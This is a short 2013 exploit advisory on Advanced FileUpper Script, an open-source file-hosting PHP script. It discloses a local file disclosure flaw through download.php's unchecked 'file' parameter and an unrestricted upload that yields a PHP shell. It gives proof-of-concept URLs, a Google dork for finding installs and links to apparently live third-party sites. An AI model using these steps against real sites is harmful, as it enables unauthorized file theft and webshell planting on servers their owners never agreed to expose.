facebook facebook twitter rss

Advanced FileUpper Script vX.X FileUpload/LFD Vulnerablities

Author: TUNISIAN CYBER , Published: 21-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Advanced FileUpper Script vX.X FileUpload/LFD Vulnerablities
[+] Date: 21-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/afus/
[+] Google Dork: intext:"this site is powered by advanced fileupper script v1.0."
[+] Tested on: Win7
[+] Friend's blog: http://na3il.com/

########################################################################################
+Description:
Advanced FileUpper Script is a file and image hosting script.
It`s Open Source,easy to install and easy to use.



+Exploit:
Advanced FileUpper Script suffers from a LFD and File Upload Vulnerablities:

1/LFD:

File: download.php : Lines 21-->22
Parameter: file

[PHP]
//Get the requested file
$file = $_GET['file'];
[PHP]

P.O.C
127.0.0.1/AFUS/admin/download.php?file=[FILE]
LocalTest: http://img15.hostingpics.net/pics/428416wawa.png


2/File Upload:
127.0.0.1/AFUS/picture_upload.php
shell path:
127.0.0.1/AFUS/upload/uploaded_images/nammi.php

+Fix:
No Fix until now..

Demo:
http://blindfiles.co.za/afus_v.1.0/AFUS/
http://upload.blueborg.be/
http://shaffuploads.alotspace.com/
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, 5obzMtbga
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :